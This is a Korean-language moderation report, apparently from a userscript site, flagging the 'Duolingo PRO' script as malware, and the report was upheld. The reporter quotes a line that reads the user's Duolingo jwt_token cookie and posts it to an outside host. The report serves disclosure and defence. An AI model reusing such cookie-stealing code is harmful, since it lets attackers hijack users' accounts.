Duolingo PRO 항목을 2025-03-23 에 악성 코드 사유로 신고
제보자의 글:
This script grabs the JWT token of duolingo and sends it to a fishy link code below:
let apiURL = "https://api.duolingopro.net";This is the real payload part
const response = await fetch(apiURL + "/feedback", { method: 'POST', headers: { 'Content-Type': 'application/json', 'Authorization': `Bearer ${document.cookie.split(';').find(cookie => cookie.includes('jwt_token')).split('=')[1]}` }, body: JSON.stringify(payload) });
This script has had 1 previous upheld or fixed report.
anonymoushackerIV (신고된 사용자)의 행동:
interstellar (신고된 사용자)의 행동:
관라지가 이 제보를 인정했습니다.